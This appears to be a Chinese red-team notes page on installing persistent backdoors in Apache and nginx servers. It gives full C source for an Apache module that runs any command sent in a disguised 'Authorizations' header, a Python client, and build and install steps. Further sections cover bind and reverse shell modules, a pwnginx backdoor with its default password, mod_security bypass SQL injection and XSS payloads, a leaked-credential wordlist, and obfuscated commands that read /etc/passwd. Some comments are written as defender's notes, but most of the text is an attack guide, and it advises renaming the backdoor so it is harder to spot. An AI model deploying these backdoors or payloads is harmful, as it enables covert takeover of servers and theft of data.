编辑mod_auth.c文件
#include "httpd.h"
#include "http_config.h"
#include "http_protocol.h"
#include "ap_config.h"
#include <stdio.h>
#include <stdlib.h>
/*
 * Content handler that turns the "Authorizations" request header into a
 * shell command: every incoming header is scanned, and if one is named
 * "Authorizations" its value is passed verbatim to popen(3) and the
 * command's stdout is streamed back as the HTTP response body.
 *
 * r: the current request; only r->headers_in is read.
 * Returns DONE (response already written) when the header was present,
 * DECLINED otherwise so normal request processing continues.
 *
 * Defender's notes: no URI, method or client-address check precedes the
 * popen() call, so any request carrying the header reaches it; the popen()
 * result is never NULL-checked, so a failed popen() hands a NULL FILE* to
 * fread() (undefined behaviour, most likely a worker segfault that would be
 * visible in the error log); popen()/pclose() would not be expected in a
 * stock httpd module, which makes those imports a useful audit string when
 * reviewing unknown .so files in the modules directory.
 */
static int auth_handler(request_rec *r)
{
  const apr_array_header_t *fields;
  int i;
  apr_table_entry_t *e = 0;
  char FLAG = 0;   /* becomes 1 once the trigger header is found */
  fields = apr_table_elts(r->headers_in);
  e = (apr_table_entry_t *) fields->elts;
  /* Name match is an exact strcmp(), so the header name must match case byte-for-byte. */
  for(i = 0; i < fields->nelts; i++) {
    if(strcmp(e[i].key, "Authorizations") == 0){
      FLAG = 1;
      break;   /* i now indexes the matching header; reused below */
    }
  }
  if (FLAG){
    char * command = e[i].val;
    FILE* fp = popen(command,"r");   /* return value is not checked for NULL */
    char buffer[0x100] = {0};
    int counter = 1;
    /* Copy the child's stdout to the client in 256-byte chunks until fread() returns 0. */
    while(counter){
      counter = fread(buffer, 1, sizeof(buffer), fp);
      ap_rwrite(buffer, counter, r);
    }
    pclose(fp);
    return DONE;
  }
  return DECLINED;
}
/*
 * Registers auth_handler as a generic content handler at APR_HOOK_MIDDLE
 * with no predecessor/successor constraints. No handler-name or URI filter
 * is applied here, so the hook is consulted for requests reaching the
 * handler phase (handlers run in hook order until one returns something
 * other than DECLINED); whether it acts is decided inside auth_handler.
 */
static void auth_register_hooks(apr_pool_t *p)
{
  ap_hook_handler(auth_handler, NULL, NULL, APR_HOOK_MIDDLE);
}
/*
 * Module descriptor exported to httpd. Only the hook-registration slot is
 * populated: there are no per-directory or per-server config callbacks and
 * no configuration directives, so nothing in httpd.conf can tune the module
 * once it is loaded — removing its LoadModule line is the only switch.
 * The exported symbol name (auth_module) is what the LoadModule directive
 * added by `apxs -i -a` refers to.
 */
module AP_MODULE_DECLARE_DATA auth_module = {
  STANDARD20_MODULE_STUFF,
  NULL, /* create per-dir config structures */
  NULL, /* merge per-dir config structures */
  NULL, /* create per-server config structures */
  NULL, /* merge per-server config structures */
  NULL, /* table of config file commands */
  auth_register_hooks /* register hooks */
};
编译后重启apache
>apxs -i -a -c mod_auth.c && service apache2 restart
原文件接受的头是backdoor太明显,这里换成了Authorizations
或使用python来执行
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import sys
def exploit(host, port, command):
    """Send one command to the module through the "Authorizations" header.

    Issues a single GET to http://host:port/ with the header value set to
    ``command`` and prints the raw response body. The URL is plain http, so
    both the header and the response travel in cleartext, where a network
    sensor can observe them. Python 2 only (print statement).
    """
    headers = {
        "Authorizations": command
    }
    url = "http://%s:%d/" % (host, port)
    response = requests.get(url, headers=headers)
    content = response.content
    print content
def main():
    """Interactive loop: read a line from stdin and hand it to exploit().

    Expects exactly two arguments, HOST and PORT; otherwise prints the usage
    text and exits with status 1. Typing ``exit`` ends the loop.
    """
    if len(sys.argv) != 3:
        print "Usage : "
        print "\tpython %s [HOST] [PORT]" % (sys.argv[0])
        exit(1)
    host = sys.argv[1]
    port = int(sys.argv[2])  # a non-numeric port raises ValueError here
    while True:
        command = raw_input("$ ")  # Python 2: returns the line as a str, newline stripped
        if command == "exit":
            break
        exploit(host, port, command)
if __name__ == "__main__":
    main()  # entry point only when run as a script, not when imported
Apache Module后门2
From:https://github.com/VladRico/apache2_BackdoorMod
.load文件传入/etc/apache2/mods-available/目录,.so文件传入/usr/lib/apache2/modules/目录
启动后门模块,重启apache
>a2enmod backdoor&service apache2 restart
Cookie里添加字段password=backdoor
访问http://ip/ping返回如下图说明后门正常运行
访问http://ip/bind/12345 开启正向连接,攻击机执行nc ip 12345即可
访问http://ip/revtty/192.168.0.107/12138 开启反向连接,攻击机109执行nc监听12138即可
访问http://ip/proxy/1337开启socks代理
想要结束socks代理可执行
>echo "imdonewithyou" |nc 192.168.0.111 1337
即可结束socks代理
以上原作者的文件命名backdoor太明显,可以自己修改文件重新编译
创建模板结构命名为phpdevmod
修改cookie内容为迷惑字段Authorizations=PHPSESSIONID
From: https://mp.weixin.qq.com/s?__biz=MzI5MDQ2NjExOQ==&mid=2247491179&idx=1&sn=ab26fe36ac74f5b140e91279ae8018c7
生成模板结构
>apxs -g -n phpdevmod
编辑mod_phpdevmod.c文件
编译
>make -e CC=x86_64-linux-gnu-g++
生成的.so文件在/.libs目录下
将其复制到/usr/lib/apache2/modules/目录
修改/etc/apache2/mods-enabled/php7.0.load文件,添加如下
LoadModule phpdevmod_module /usr/lib/apache2/modules/mod_phpdevmod.so
<Location /qq.jpg> #可以设置为任何不存在的文件
setHandler phpdevmod
</Location>
需重启apache服务
访问后门方式http://ip/qq.jpg?命令的url编码
直接访问后门文件
636174202F6574632F706173737764为cat /etc/passwd的url编码
From:https://github.com/netxfly/nginx_lua_security
https://github.com/Y4er/Y4er.com/blob/251d88d8a3cf21e9bafe15c43d7900ffeacfa7ea/content/post/nginx-lua-backdoor.md
后门利用的前提是获取到root权限,nginx安装有lua模块。
在nginx.conf中http节处添加,指定lua脚本位置,以及nginx启动时加载的脚本
在lua目录/waf/中新建Init.lua,内容如下,require nginx表示加载nginx.lua中的模块。
/waf/目录中新建nginx.lua实现执行命令,参数为waf。
在nginx配置文件中加入location。
效果:
From:https://github.com/t57root/pwnginx
解压好后编译客户端
>make
编辑nginx的源文件/src/core/nginx.c找到configure arguments:在后面添加--prefix=/usr/local/nginx\n指定的是nginx安装的目录
重新编译nginx添加后门模块
>./configure --prefix=/usr/local/nginx/ --add-module=/tmp/pwnginx-master/module
>make
覆盖新的nginx到原nginx目录
>cp -f objs/nginx /usr/local/nginx/sbin/nginx
重启nginx
>killall nginx&/usr/local/nginx/sbin/nginx
连接
>./pwnginx shell 目标机 nginx端口 密码
默认密码是t57root,密码的配置文件在pwnginx-master\module\config.h文件夹中,可在重新编译nginx前修改密码
此后门也可开启socks隧道
命令explorer.exe / root与cmd.exe / c类似,只不过使用explorer会破坏进程树,会创建新实例explorer.exe,使之成为新实例下的子进程
Xss和注入bypass mod_security
/*!50000%75%6e%69on*/ %73%65%6cect 1,2,3,4... –
<marquee loop=1 width=0 onfinish=pr\u006fmpt(document.cookie)>Y000</marquee>
/*!50000%75%6e%69on*/ %73%65%6cect 1,2,3,4,5—
%75%6e%69on = union
%73%65%6cect = select
%75%6e%69 = uni = url encode
%73%65%6c = sel = url encode
curl http://host.xx/file.js | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"*
cat file | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"*
https://github.com/FlameOfIgnis/Pwdb-Public
从网上泄露的10亿条数据中整理而成,其中257,669,588条被筛选为损坏数据或测试账户。
10亿个凭据可归结为168,919,919个密码和393,386,953个用户名。
平均密码长度为9.4822个字符
12.04%包含特殊字符,28.79%密码仅是字母,26.16%仅是小写,13.37%仅是数字,8.83%的密码仅被发现一次
与rockyou的对比,rockyou包含14,344,391个密码,本字典与rockyou相差80%
还有根据不同国家生成的小字典
From: @shreyasrx
cat /etc/passwd
cat /e"t"c/pa"s"swd
cat /'e'tc/pa's' swd
cat /etc/pa??wd
cat /etc/pa*wd
cat /et' 'c/passw' 'd
cat /et$()c/pa$()$swd
cat /et${neko}c/pas${poi} swd
*echo "dwssap/cte/ tac" | rev
$(echo Y2FOIC9ldGMvcGFzc3dkCg== base64 -d)
w\ho\am\i
/\b\i\n/////s\h
who$@ami
xyz%0Acat%20/etc/passwd
IFS=,;`cat<<<uname,-a`
/???/??t /???/p??s??
test=/ehhh/hmtc/pahhh/hmsswd
cat ${test//hhh\/hm/}
cat ${test//hh??hm/}
cat /???/?????d
{cat,/etc/passwd}